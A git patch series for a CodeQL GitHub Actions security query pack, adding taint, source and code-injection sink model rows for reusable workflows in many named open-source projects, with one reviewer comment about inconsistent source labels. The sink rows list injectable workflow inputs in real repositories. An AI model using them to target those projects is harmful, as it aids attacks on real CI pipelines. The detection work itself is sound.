 - ["element-hq/element-desktop/.github/workflows/build_macos.yaml", "*", "inputs.version", "code-injection", "generated"]
- - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["element-hq/element-desktop/.github/workflows/build_linux.yaml", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["element-hq/element-desktop/.github/workflows/build_prepare.yaml", "*", "input.deploy", "output.deploy", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
new file mode 100644
index 00000000000..2a9e2f9fd1a
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/envoyproxy_envoy.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.run-id", "output.run-id", "taint", "manual"]
+ - ["envoyproxy/envoy/.github/workflows/_load.yml", "*", "input.check-name", "output.check-name", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
new file mode 100644
index 00000000000..c9c7e8318f7
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/hashgraph_hedera-services.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image-tag", "taint", "manual"]
+ - ["hashgraph/hedera-services/.github/workflows/zxc-publish-production-image.yaml", "*", "input.version", "output.docker-image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
index f9b7785cab9..d8be4cc11b9 100644
--- a/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/hashicorp_vault.model.yml
@@ -13,4 +13,10 @@ extensions:
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.go-arch", "code-injection", "generated"]
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.binary-tests", "code-injection", "generated"]
 - ["hashicorp/vault/.github/workflows/test-go.yml", "*", "inputs.total-runners", "code-injection", "generated"]
- - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"]
\ No newline at end of file
+ - ["hashicorp/vault/.github/workflows/test-enos-scenario-ui.yml", "*", "inputs.storage_backend", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-version-package", "output.testable-packages", "taint", "manual"]
+ - ["hashicorp/vault/.github/workflows/build-artifacts-ce.yml", "*", "input.vault-revision", "output.testable-containers", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
index e263590260f..e8c98ab4576 100644
--- a/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/hitobito_hitobito.model.yml
@@ -4,4 +4,12 @@ extensions:
 extensible: sinkModel
 data:
 - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.project_name", "code-injection", "generated"]
- - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"]
\ No newline at end of file
+ - ["hitobito/hitobito/.github/workflows/sbom.yml", "*", "inputs.dependency_track_url", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.stage", "output.release_stage", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_url", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.repo_name", "taint", "manual"]
+ - ["hitobito/hitobito/.github/workflows/stage-settings.yml", "*", "input.repository", "output.project", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
index 50bbdaf8153..819f9f0e35d 100644
--- a/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/kubeshop_botkube.model.yml
@@ -4,4 +4,9 @@ extensions:
 extensible: sinkModel
 data:
 - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.next-version", "code-injection", "generated"]
- - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"]
\ No newline at end of file
+ - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "inputs.release-branch", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["kubeshop/botkube/.github/workflows/process-chart.yml", "*", "input.next-version", "output.new-version", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
new file mode 100644
index 00000000000..3b8a83bc8c6
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/neondatabase_neon.model.yml
@@ -0,0 +1,7 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image-tag", "taint", "manual"]
+ - ["neondatabase/neon/.github/workflows/build-build-tools-image.yml", "*", "input.image-tag", "output.image", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
new file mode 100644
index 00000000000..0d96077345f
--- /dev/null
+++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml
@@ -0,0 +1,6 @@
+extensions:
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: sourceModel
+ data:
+ - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "Changed files", "manual"]
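Review bot: The `sourceModel` row in the new `puppeteer_puppeteer.model.yml` labels its source `"Changed files"`, while the `sourceModel` row added for `googlecloudplatform/magic-modules` in the preceding patch uses `"PR changed files"` for what appears to be the same kind of attacker-influenced data. If queries or alert messages select or display on this column (not verifiable from the hunk), two spellings for one source type give inconsistent results. Picking one label, for example `"PR changed files"`, and using it in both rows keeps the source models uniform.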
diff --git a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
index 74bdcb807c8..0c542713430 100644
--- a/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/streetsidesoftware_cspell.model.yml
@@ -3,4 +3,9 @@ extensions:
 pack: githubsecuritylab/actions-all
 extensible: sinkModel
 data:
- - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"]
\ No newline at end of file
+ - ["streetsidesoftware/cspell/.github/workflows/reuseable-pr-from-artifact.yml", "*", "inputs.patch_path", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml", "*", "input.ref", "output.ref", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
index 82f5ba4be74..b5d1263f743 100644
--- a/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/tencent_hippy.model.yml
@@ -6,4 +6,10 @@ extensions:
 - ["tencent/hippy/.github/workflows/reuse_get_workflow_output.yml", "*", "inputs.workflow_run", "code-injection", "generated"]
 - ["tencent/hippy/.github/workflows/reuse_classify_commits.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
 - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_head_sha", "code-injection", "generated"]
- - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
\ No newline at end of file
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "inputs.pull_request_number", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_head_sha", "output.pull_request_head_sha", "taint", "manual"]
+ - ["tencent/hippy/.github/workflows/reuse_approve_checks_run.yml", "*", "input.pull_request_number", "output.pull_request_number", "taint", "manual"]
diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
index 26f9f659a2d..f7ee9b66305 100644
--- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
+++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml
@@ -6,4 +6,9 @@ extensions:
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.image_name", "code-injection", "generated"]
 - ["zitadel/zitadel/.github/workflows/release.yml", "*", "inputs.build_image_name", "code-injection", "generated"]
 - ["zitadel/zitadel/.github/workflows/container.yml", "*", "inputs.build_image_name", "code-injection", "generated"]
- - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"]
\ No newline at end of file
+ - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "inputs.version", "code-injection", "generated"]
+ - addsTo:
+ pack: githubsecuritylab/actions-all
+ extensible: summaryModel
+ data:
+ - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"]
From 764f6fbc0d691b47b85f361da1f93f642b7d4a59 Mon Sep 17 00:00:00 2001
From: jorgectf Date: Tue, 16 Apr 2024 21:35:30 +0200 Subject: [PATCH 0177/1267] Fix "inputs" models typo --- ...ctions_actions-runner-controller.model.yml | 18 +++---- .../composite-actions/adap_flower.model.yml | 8 ++-- .../agoric_agoric-sdk.model.yml | 12 ++--- .../airbnb_lottie-ios.model.yml | 2 +- .../airbytehq_airbyte.model.yml | 4 +- .../amazon-ion_ion-java.model.yml | 4 +- .../composite-actions/anchore_grype.model.yml | 2 +- .../composite-actions/anchore_syft.model.yml | 2 +- .../angular_dev-infra.model.yml | 10 ++-- .../ansible_ansible-lint.model.yml | 4 +- .../composite-actions/ansible_awx.model.yml | 4 +- .../apache_arrow-datafusion.model.yml | 2 +- .../apache_arrow-rs.model.yml | 4 +- .../composite-actions/apache_arrow.model.yml | 2 +- .../apache_bookkeeper.model.yml | 2 +- .../composite-actions/apache_brpc.model.yml | 2 +- .../apache_camel-k.model.yml | 24 +++++----- .../composite-actions/apache_camel.model.yml | 12 ++--- .../composite-actions/apache_flink.model.yml | 10 ++-- .../composite-actions/apache_nuttx.model.yml | 6 +-- .../apache_opendal.model.yml | 8 ++-- .../composite-actions/apache_pekko.model.yml | 2 +- .../apache_pulsar-helm-chart.model.yml | 14 +++--- .../apache_superset.model.yml | 2 +- .../appflowy-io_appflowy.model.yml | 4 +- .../aptos-labs_aptos-core.model.yml | 6 +-- .../archivesspace_archivesspace.model.yml | 2 +- .../armadaproject_armada.model.yml | 2 +- .../composite-actions/armbian_build.model.yml | 18 +++---- .../auth0_auth0-java.model.yml | 8 ++-- .../auth0_auth0.net.model.yml | 6 +-- .../auth0_auth0.swift.model.yml | 2 +- .../autogluon_autogluon.model.yml | 10 ++-- .../composite-actions/avaiga_taipy.model.yml | 2 +- .../aws-amplify_amplify-cli.model.yml | 2 +- .../aws_amazon-vpc-cni-k8s.model.yml | 4 +- .../aws_karpenter-provider-aws.model.yml | 4 +- .../awslabs_amazon-eks-ami.model.yml | 14 +++--- .../awslabs_aws-lambda-rust-runtime.model.yml | 2 +- .../azerothcore_azerothcore-wotlk.model.yml | 4 +- 
.../azure_azure-datafactory.model.yml | 4 +- .../badges_shields.model.yml | 2 +- .../balena-io_etcher.model.yml | 2 +- .../balena-os_balena-engine.model.yml | 2 +- .../ben-manes_caffeine.model.yml | 10 ++-- .../composite-actions/bokeh_bokeh.model.yml | 2 +- .../botpress_botpress.model.yml | 2 +- ...intree_braintree-android-drop-in.model.yml | 6 +-- .../braintree_braintree_android.model.yml | 8 ++-- .../broadinstitute_gatk.model.yml | 6 +-- .../canonical_multipass.model.yml | 4 +- .../chia-network_actions.model.yml | 12 ++--- .../chia-network_chia-blockchain.model.yml | 2 +- .../chipsalliance_chisel.model.yml | 4 +- .../chocobozzz_peertube.model.yml | 4 +- .../cilium_cilium-cli.model.yml | 14 +++--- .../composite-actions/cilium_cilium.model.yml | 6 +-- .../citusdata_citus.model.yml | 6 +-- .../clerk_javascript.model.yml | 10 ++-- .../cloud-custodian_cloud-custodian.model.yml | 8 ++-- .../cloudflare_workers-sdk.model.yml | 2 +- ...cloudfoundry_cloud_controller_ng.model.yml | 2 +- .../composite-actions/coder_coder.model.yml | 2 +- .../composite-actions/coil-kt_coil.model.yml | 2 +- .../commaai_openpilot.model.yml | 6 +-- .../conan-io_conan-center-index.model.yml | 4 +- .../corretto_corretto-8.model.yml | 8 ++-- .../cosmos_cosmos-sdk.model.yml | 2 +- .../composite-actions/coturn_coturn.model.yml | 2 +- .../crunchydata_postgres-operator.model.yml | 2 +- .../composite-actions/cvc5_cvc5.model.yml | 20 ++++---- .../composite-actions/d2l-ai_d2l-en.model.yml | 8 ++-- ...build-check-deploy-gradle-action.model.yml | 14 +++--- .../datadog_dd-trace-dotnet.model.yml | 10 ++-- .../datadog_dd-trace-go.model.yml | 8 ++-- .../datadog_dd-trace-js.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../davatorium_rofi.model.yml | 6 +-- .../debezium_debezium.model.yml | 2 +- .../defenseunicorns_zarf.model.yml | 2 +- ...lifiees_demarches-simplifiees.fr.model.yml | 2 +- ...of-veterans-affairs_vets-website.model.yml | 2 +- .../devexpress_devextreme.model.yml | 6 +-- 
.../diggerhq_digger.model.yml | 8 ++-- .../diku-dk_futhark.model.yml | 4 +- .../discourse_.github.model.yml | 2 +- .../dnsjava_dnsjava.model.yml | 6 +-- .../dotintent_react-native-ble-plx.model.yml | 2 +- .../dotnet_docs-tools.model.yml | 2 +- .../dotnet_dotnet-monitor.model.yml | 2 +- .../dragonflydb_dragonfly.model.yml | 8 ++-- .../eksctl-io_eksctl.model.yml | 6 +-- .../elastic_apm-agent-dotnet.model.yml | 4 +- .../elastic_apm-agent-java.model.yml | 10 ++-- .../elementor_elementor.model.yml | 16 +++---- .../composite-actions/emberjs_data.model.yml | 2 +- .../composite-actions/emqx_emqx.model.yml | 6 +-- .../eonasdan_tempus-dominus.model.yml | 4 +- .../composite-actions/erlang_otp.model.yml | 4 +- .../esphome_esphome.model.yml | 6 +-- .../composite-actions/expensify_app.model.yml | 18 +++---- .../composite-actions/expo_expo.model.yml | 2 +- .../expo_vscode-expo.model.yml | 6 +-- ...xternal-secrets_external-secrets.model.yml | 4 +- .../facebook_buck2.model.yml | 2 +- .../composite-actions/facebook_flow.model.yml | 2 +- .../composite-actions/facebook_yoga.model.yml | 4 +- .../facebookresearch_xformers.model.yml | 10 ++-- .../fastly_compute-actions.model.yml | 2 +- .../composite-actions/felangel_bloc.model.yml | 8 ++-- .../firebase_firebase-ios-sdk.model.yml | 8 ++-- .../flaxengine_flaxengine.model.yml | 2 +- ...pperdevices_flipperzero-firmware.model.yml | 10 ++-- .../composite-actions/fluxcd_flux2.model.yml | 6 +-- .../forcedotcom_salesforcedx-vscode.model.yml | 2 +- .../fossasia_visdom.model.yml | 4 +- .../freckle_stack-action.model.yml | 2 +- .../freeradius_freeradius-server.model.yml | 6 +-- .../composite-actions/gaphor_gaphor.model.yml | 4 +- .../getsentry_action-release.model.yml | 2 +- .../github_codeql-action.model.yml | 10 ++-- .../composite-actions/github_ruby.model.yml | 10 ++-- .../gittools_gitversion.model.yml | 6 +-- .../go-spatial_tegola.model.yml | 4 +- .../goauthentik_authentik.model.yml | 2 +- .../godotengine_godot.model.yml | 8 ++-- 
.../composite-actions/google_dagger.model.yml | 2 +- .../googleapis_java-cloud-bom.model.yml | 2 +- .../googleapis_sdk-platform-java.model.yml | 2 +- ...ecloudplatform_dataflowtemplates.model.yml | 2 +- ...ooglecloudplatform_magic-modules.model.yml | 2 +- .../gravitational_teleport.model.yml | 10 ++-- .../grote_transportr.model.yml | 2 +- .../hashicorp_nomad.model.yml | 2 +- .../hashicorp_terraform.model.yml | 10 ++-- .../hashicorp_vault.model.yml | 4 +- .../home-assistant_android.model.yml | 6 +-- .../homebrew_actions.model.yml | 18 +++---- ...erledger_aries-cloudagent-python.model.yml | 2 +- .../hyperledger_fabric-samples.model.yml | 6 +-- .../igniterealtime_openfire.model.yml | 6 +-- .../infracost_actions.model.yml | 2 +- ...nspektor-gadget_inspektor-gadget.model.yml | 26 +++++----- .../intel-analytics_ipex-llm.model.yml | 2 +- .../ionic-team_ionic-framework.model.yml | 22 ++++----- .../ionic-team_ionicons.model.yml | 18 +++---- .../ionic-team_stencil.model.yml | 12 ++--- .../composite-actions/ipfs_aegir.model.yml | 8 ++-- .../jetbrains_jetbrainsruntime.model.yml | 2 +- .../jhipster_generator-jhipster.model.yml | 34 ++++++------- .../jsocol_django-ratelimit.model.yml | 2 +- .../juicedata_juicefs.model.yml | 14 +++--- .../jupyter_docker-stacks.model.yml | 6 +-- .../keycloak_keycloak.model.yml | 6 +-- .../composite-actions/kserve_kserve.model.yml | 6 +-- .../kubeflow_katib.model.yml | 10 ++-- .../kubeflow_training-operator.model.yml | 2 +- .../kubernetes-sigs_karpenter.model.yml | 2 +- .../kubernetes-sigs_kwok.model.yml | 2 +- .../kubescape_kubescape.model.yml | 4 +- .../kubeshop_botkube.model.yml | 4 +- .../kyverno_kyverno.model.yml | 6 +-- .../composite-actions/lancedb_lance.model.yml | 8 ++-- .../launchdarkly_ios-client-sdk.model.yml | 2 +- .../layer5labs_meshmap-snapshot.model.yml | 12 ++--- .../ldc-developers_ldc.model.yml | 20 ++++---- .../ledgerhq_ledger-live.model.yml | 6 +-- .../composite-actions/lerna_lerna.model.yml | 2 +- 
.../composite-actions/lf-edge_eve.model.yml | 6 +-- .../libgit2_libgit2.model.yml | 14 +++--- .../lightning-ai_pytorch-lightning.model.yml | 16 +++---- .../lightning-ai_torchmetrics.model.yml | 6 +-- .../linkerd_linkerd2.model.yml | 8 ++-- .../logseq_publish-spa.model.yml | 8 ++-- .../macvim-dev_macvim.model.yml | 4 +- .../mamba-org_mamba.model.yml | 6 +-- .../maplibre_maplibre-native.model.yml | 22 ++++----- .../mastodon_mastodon.model.yml | 2 +- .../mavlink_qgroundcontrol.model.yml | 6 +-- .../mdanalysis_mdanalysis.model.yml | 16 +++---- .../medic_cht-core.model.yml | 6 +-- .../medusajs_medusa.model.yml | 6 +-- .../metabase_metabase.model.yml | 24 +++++----- ...etamask_action-create-release-pr.model.yml | 6 +-- .../metamask_action-npm-publish.model.yml | 2 +- .../microsoft_fluentui.model.yml | 2 +- .../microsoft_playwright.model.yml | 12 ++--- .../composite-actions/microsoft_wsl.model.yml | 4 +- .../milvus-io_milvus.model.yml | 2 +- .../composite-actions/mlflow_mlflow.model.yml | 2 +- .../modin-project_modin.model.yml | 6 +-- .../mozilla_addons-server.model.yml | 4 +- .../mozilla_bedrock.model.yml | 2 +- .../mozilla_sccache.model.yml | 2 +- .../msys2_setup-msys2.model.yml | 2 +- .../mumble-voip_mumble.model.yml | 6 +-- .../composite-actions/nasa_fprime.model.yml | 2 +- .../nats-io_nats-server.model.yml | 6 +-- ..._optic-release-automation-action.model.yml | 6 +-- .../composite-actions/nektos_act.model.yml | 14 +++--- ...4j-contrib_neo4j-apoc-procedures.model.yml | 4 +- .../neondatabase_neon.model.yml | 16 +++---- .../composite-actions/neovim_neovim.model.yml | 2 +- .../composite-actions/nhost_nhost.model.yml | 2 +- .../nix-community_nixos-wsl.model.yml | 4 +- .../composite-actions/novuhq_novu.model.yml | 2 +- .../composite-actions/nymtech_nym.model.yml | 2 +- .../obsproject_obs-studio.model.yml | 28 +++++------ .../composite-actions/ocaml_dune.model.yml | 10 ++-- .../oneflow-inc_oneflow.model.yml | 14 +++--- ...metry_opentelemetry-ruby-contrib.model.yml | 6 +-- 
...pen-telemetry_opentelemetry-ruby.model.yml | 4 +- .../open-watcom_open-watcom-v2.model.yml | 6 +-- .../openapitools_openapi-generator.model.yml | 6 +-- .../composite-actions/openjdk_jdk.model.yml | 2 +- ...pensearch-project_opensearch-net.model.yml | 6 +-- .../opensearch-project_security.model.yml | 2 +- .../opentrons_opentrons.model.yml | 14 +++--- .../openvinotoolkit_openvino.model.yml | 22 ++++----- ...enzeppelin-contracts-upgradeable.model.yml | 14 +++--- ...nzeppelin_openzeppelin-contracts.model.yml | 14 +++--- .../composite-actions/oppia_oppia.model.yml | 2 +- .../composite-actions/oracle_graal.model.yml | 4 +- .../oracle_truffleruby.model.yml | 2 +- .../orhun_git-cliff.model.yml | 2 +- .../composite-actions/oven-sh_bun.model.yml | 4 +- .../owntracks_android.model.yml | 4 +- .../pandas-dev_pandas.model.yml | 6 +-- .../pardeike_harmony.model.yml | 8 ++-- .../pennylaneai_pennylane.model.yml | 4 +- .../phalcon_cphalcon.model.yml | 16 +++---- .../philosowaffle_peloton-to-garmin.model.yml | 4 +- .../composite-actions/php_php-src.model.yml | 10 ++-- .../phpdocumentor_phpdocumentor.model.yml | 4 +- ...necone-io_pinecone-python-client.model.yml | 10 ++-- .../composite-actions/pixijs_pixijs.model.yml | 2 +- .../posthog_posthog.model.yml | 4 +- .../composite-actions/primer_react.model.yml | 4 +- .../project-chip_connectedhomeip.model.yml | 6 +-- .../projectnessie_nessie.model.yml | 8 ++-- .../composite-actions/psf_black.model.yml | 2 +- .../pyca_cryptography.model.yml | 2 +- .../pyg-team_pytorch_geometric.model.yml | 6 +-- .../python-poetry_poetry.model.yml | 2 +- .../composite-actions/python_mypy.model.yml | 4 +- .../quarto-dev_quarto-cli.model.yml | 20 ++++---- .../composite-actions/quay_clair.model.yml | 12 ++--- .../quickwit-oss_quickwit.model.yml | 4 +- .../composite-actions/r-lib_actions.model.yml | 26 +++++----- .../randombit_botan.model.yml | 4 +- .../raspberrypi_documentation.model.yml | 14 +++--- .../ray-project_kuberay.model.yml | 2 +- 
.../readthedocs_actions.model.yml | 10 ++-- .../reflex-dev_reflex.model.yml | 2 +- .../renovatebot_renovate.model.yml | 2 +- .../rethinkdb_rethinkdb.model.yml | 8 ++-- .../composite-actions/risc0_risc0.model.yml | 8 ++-- .../rocketchat_rocket.chat.model.yml | 8 ++-- .../composite-actions/rook_rook.model.yml | 8 ++-- .../composite-actions/roots_trellis.model.yml | 2 +- .../composite-actions/ruby_debug.model.yml | 2 +- .../composite-actions/ruby_ruby.model.yml | 10 ++-- .../composite-actions/rusefi_rusefi.model.yml | 10 ++-- .../saltstack_salt.model.yml | 18 +++---- .../sap_sapmachine.model.yml | 2 +- .../scala-native_scala-native.model.yml | 4 +- .../composite-actions/scitools_iris.model.yml | 6 +-- .../scylladb_scylla-operator.model.yml | 8 ++-- .../shader-slang_slang.model.yml | 10 ++-- .../shaka-project_shaka-player.model.yml | 8 ++-- ...ode_react-webpack-rails-tutorial.model.yml | 4 +- .../simple-icons_simple-icons.model.yml | 2 +- .../slint-ui_slint.model.yml | 4 +- .../solidusio_solidus.model.yml | 8 ++-- .../composite-actions/solo-io_gloo.model.yml | 2 +- .../composite-actions/sonarr_sonarr.model.yml | 14 +++--- .../sonic-pi-net_sonic-pi.model.yml | 6 +-- .../spacedriveapp_spacedrive.model.yml | 2 +- .../spockframework_spock.model.yml | 2 +- .../spring-io_initializr.model.yml | 4 +- .../spring-io_start.spring.io.model.yml | 4 +- .../spring-projects_spring-boot.model.yml | 4 +- ...spring-projects_spring-framework.model.yml | 4 +- .../spring-projects_spring-graphql.model.yml | 4 +- .../square_workflow-kotlin.model.yml | 6 +-- .../stefanprodan_podinfo.model.yml | 4 +- .../composite-actions/stellar_go.model.yml | 2 +- .../streetsidesoftware_cspell.model.yml | 2 +- .../subquery_subql.model.yml | 2 +- .../swagger-api_swagger-codegen.model.yml | 12 ++--- .../swagger-api_swagger-parser.model.yml | 12 ++--- .../tarantool_tarantool.model.yml | 8 ++-- .../telepresenceio_telepresence.model.yml | 2 +- .../tensorflow_datasets.model.yml | 4 +- 
.../texstudio-org_texstudio.model.yml | 2 +- .../toeverything_affine.model.yml | 16 +++---- .../treeverse_lakefs.model.yml | 6 +-- .../trezor_trezor-firmware.model.yml | 8 ++-- .../tribler_tribler.model.yml | 10 ++-- .../trunk-io_trunk-action.model.yml | 16 +++---- .../composite-actions/unidata_metpy.model.yml | 2 +- .../unstructured-io_unstructured.model.yml | 2 +- .../composite-actions/vercel_turbo.model.yml | 2 +- .../vesoft-inc_nebula.model.yml | 14 +++--- .../composite-actions/vkcom_vkui.model.yml | 12 ++--- .../vuetifyjs_vuetify.model.yml | 8 ++-- .../wagoodman_dive.model.yml | 2 +- ...lletconnect_walletconnectswiftv2.model.yml | 16 +++---- .../composite-actions/wazuh_wazuh.model.yml | 6 +-- .../web-infra-dev_rspack.model.yml | 6 +-- .../webassembly_wabt.model.yml | 2 +- .../composite-actions/wntrblm_nox.model.yml | 2 +- .../composite-actions/xrplf_rippled.model.yml | 6 +-- .../composite-actions/zcash_zcash.model.yml | 4 +- .../zenml-io_zenml.model.yml | 2 +- .../composite-actions/zeroc-ice_ice.model.yml | 4 +- .../0xpolygon_polygon-edge.model.yml | 2 +- .../reusable-workflows/8vim_8vim.model.yml | 8 ++-- .../actions_reusable-workflows.model.yml | 12 ++--- .../reusable-workflows/adap_flower.model.yml | 6 +-- .../aio-libs_multidict.model.yml | 4 +- .../aio-libs_yarl.model.yml | 4 +- .../airbytehq_airbyte.model.yml | 2 +- .../alphagov_collections.model.yml | 2 +- .../alphagov_frontend.model.yml | 2 +- .../alphagov_publishing-api.model.yml | 2 +- .../reusable-workflows/apache_druid.model.yml | 20 ++++---- .../reusable-workflows/apache_flink.model.yml | 4 +- .../reusable-workflows/apache_spark.model.yml | 4 +- .../argilla-io_argilla.model.yml | 2 +- .../argoproj_argo-cd.model.yml | 6 +-- .../argoproj_argo-rollouts.model.yml | 6 +-- .../aws-amplify_amplify-ui.model.yml | 2 +- .../reusable-workflows/azure_apiops.model.yml | 2 +- .../azure_mlops-templates.model.yml | 16 +++---- .../bbq-beets_avocaddo-cmw.model.yml | 8 ++-- .../bbq-beets_mobile-ci-cd.model.yml | 8 
++-- .../bbq-beets_yujincat-action.model.yml | 4 +- .../bdunderscore_modular-avatar.model.yml | 2 +- .../benc-uk_workflow-dispatch.model.yml | 2 +- .../bridgecrewio_checkov.model.yml | 6 +-- .../bugsnag_bugsnag-ruby.model.yml | 2 +- ...ecodealliance_wasm-micro-runtime.model.yml | 34 ++++++------- .../celo-org_celo-blockchain.model.yml | 4 +- .../cemu-project_cemu.model.yml | 2 +- .../cesiumgs_cesium-unreal.model.yml | 48 +++++++++---------- .../reusable-workflows/cgal_cgal.model.yml | 2 +- .../checkstyle_checkstyle.model.yml | 18 +++---- .../chia-network_actions.model.yml | 4 +- .../chipsalliance_chisel.model.yml | 4 +- .../clickhouse_clickhouse.model.yml | 18 +++---- .../cloudfoundry_cli.model.yml | 2 +- .../cocotb_cocotb.model.yml | 6 +-- .../codeigniter4_codeigniter4.model.yml | 8 ++-- .../com-lihaoyi_mill.model.yml | 4 +- .../cosmos_ibc-go.model.yml | 24 +++++----- .../crowdsecurity_crowdsec.model.yml | 4 +- .../cryptomator_cryptomator.model.yml | 4 +- .../daeuniverse_dae.model.yml | 4 +- .../dafny-lang_dafny.model.yml | 8 ++-- .../dagger_dagger.model.yml | 4 +- .../dash-industry-forum_dash.js.model.yml | 4 +- .../datadog_dd-trace-go.model.yml | 2 +- .../datadog_dd-trace-py.model.yml | 4 +- .../datafuselabs_databend.model.yml | 4 +- .../dbt-labs_dbt-bigquery.model.yml | 18 +++---- .../dbt-labs_dbt-core.model.yml | 8 ++-- .../dbt-labs_dbt-snowflake.model.yml | 18 +++---- .../decidim_decidim.model.yml | 2 +- .../defectdojo_django-defectdojo.model.yml | 2 +- ...dependencytrack_dependency-track.model.yml | 2 +- .../devexpress_testcafe.model.yml | 10 ++-- .../dfhack_dfhack.model.yml | 26 +++++----- .../docker_build-push-action.model.yml | 4 +- .../dragonwell-project_dragonwell11.model.yml | 2 +- .../earthly_earthly.model.yml | 34 ++++++------- .../eclipse-vertx_vert.x.model.yml | 2 +- .../eclipse-vertx_vertx-sql-client.model.yml | 2 +- .../elastic_elasticsearch-net.model.yml | 2 +- .../element-hq_element-desktop.model.yml | 12 ++--- .../etcd-io_bbolt.model.yml | 4 
